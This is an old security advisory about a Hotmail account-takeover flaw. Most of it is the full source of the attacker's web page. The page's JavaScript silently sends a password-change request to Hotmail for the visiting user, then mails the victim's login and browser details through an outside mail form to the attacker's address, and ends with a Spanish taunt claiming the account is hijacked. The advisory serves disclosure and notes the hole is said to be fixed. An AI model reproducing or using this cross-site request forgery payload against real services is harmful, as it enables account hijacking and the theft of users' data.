COMMAND

    Hotmail

SYSTEMS AFFECTED

    Hotmail users

PROBLEM

    David L. Nicol posted following.   It's exploit for Hotmail  which
    should  be  fixed  now.   If  Hotmail  merely changed the names of
    variables, or did a similar short term fix, the next expolit might
    not be nice enough to announce  itself as such.  Modifying the  El
    Lite exploit to only work  if it had a particular  hotmail account
    might be a piece of cake; allowing for some highly targeted  kinds
    of attacks. (esp.  if a hotmail  user is doing  anything involving
    return-email verification, like tipjar or first virtual.)

    Here is the hacker's tripod page, including the exploit that takes
    advantage  of  the  trust  hotmail  has for instructions from your
    browser, by  secretly sending  instructions to  hotmail to  change
    your password to

    <HTML>
    <kraffa2="<HEAD>
    <!--Begin JavaScrypt roadmap code.  If editing downloaded HTML source,
    delete
     this portion.-->

    <scrypt language="JavaScrypt">


    <!--

    function TripodShowPopup()
    {
            // open the popup window
            var popupURL = "http://members.tripod.com/adm/popup/roadmap.shtml";
            var popup =
        window.open(popupURL,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105');
            // set the opener if it's not already set.  it's set automatically
            // in netscape 3.0+ and ie 3.0+.
            if( navigator.appName.substring(0,8) == "Netscape" )
            {
                    popup.location = popupURL;
            }
    }

    TripodShowPopup();

    // -->


    </scrypt>

    <!--End inserted JavaScript code.-->
    <base href="http://members.tripod.com/kraffa2/Hook.html">
    </HEAD>

    <body>
    <scrypt>
    <!--

    function getCGIValue(nombre, elURL)
            {
            elURL= elURL;
            nombre= nombre+"=";
            vacio="";
            found= elURL.indexOf(nombre);
            if (found > -1)
                    {
                    found2= elURL.indexOf("&",found);
                    found+= nombre.length;
                    end= (found2 > -1) ? found2 : elURL.length;
                    var value= elURL.substring(found, end);
                    value= (value != null) ? value : vacio;
                    return value;
 
                    }
            else {return vacio;}

    }

    Query= unescape(self.location.search);
    disk= getCGIValue("disk", Query);
    login= getCGIValue("login", Query);
    host= "www.hotmail.com";
    hintq= escape('<img
    src="http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by El
    Lite©</center>');
    hinta= '%66axf%61x';
    TheURL=
    "http://
    "+host+"/cgi-bin/dopassword?"+"disk="+disk+"&login="+login+"&f=34145&curmbox=ACTIVE&_lang=&np=yes&new_%70%61%73s%77d=%6B%6B%6A%6A01&new_%70%61%73s%77d2=kk%6A%6A01&hi%6E%74q="+hintq+"&hinta="+hinta;
    Mail=
    "http://www.tipjar.com/cgi-bin/generic?mailto=paulinaporizkova@hotmail.com&mailfrom=
    "+login+"@hotmail.com&subject="+login+"+HMpass+cambiada+%0A%0ASu+navegador+es+"+escape(navigator.userAgent+"\n.\n");
 
    options=
    'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105';

    HOTMAIL= window.open(TheURL,"HOTMAIL",options);
    self.focus();
    setTimeout("HOTMAIL.close()",8000);

    MAIL= window.open(Mail,"MAIL",options);
    self.focus();
    setTimeout("MAIL.close()",8000);



    //-->
    </scrypt>



    <pre><b>

      Uno de los mejores correos gratis que existen es precisamente el que
      tu estás usando, hotmail. Su seguridad e inviolabilidad son ya
      legendarias.

      Tanto es así que mira por donde a partir de este mismísimo momento las
      cosas van a tomar otro cariz. Quiero decir que lamentándolo mucho tu
      dirección de hotmail ha sido inutilizada, o mejor dicho, secuestrada
      por mi.

      Ya nunca mas podrás entrar en ella.

      Así de definitivo. Ahora es

                                    SOLO MIAAA!!!! :-))))

      Como soy un buenazo y no eres mi única víctima pues un dia de estos
      voy a publicar en es.comp.hackers la password que os puse (es la misma 
      para todos vosotros pardillos)

      Hala, que te sea leve

      El Lite©
    </b></pre>
    </body>
    </html>
    </FONT>
SOLUTION

    Hotmail claims not to be vulnerable to this anymore.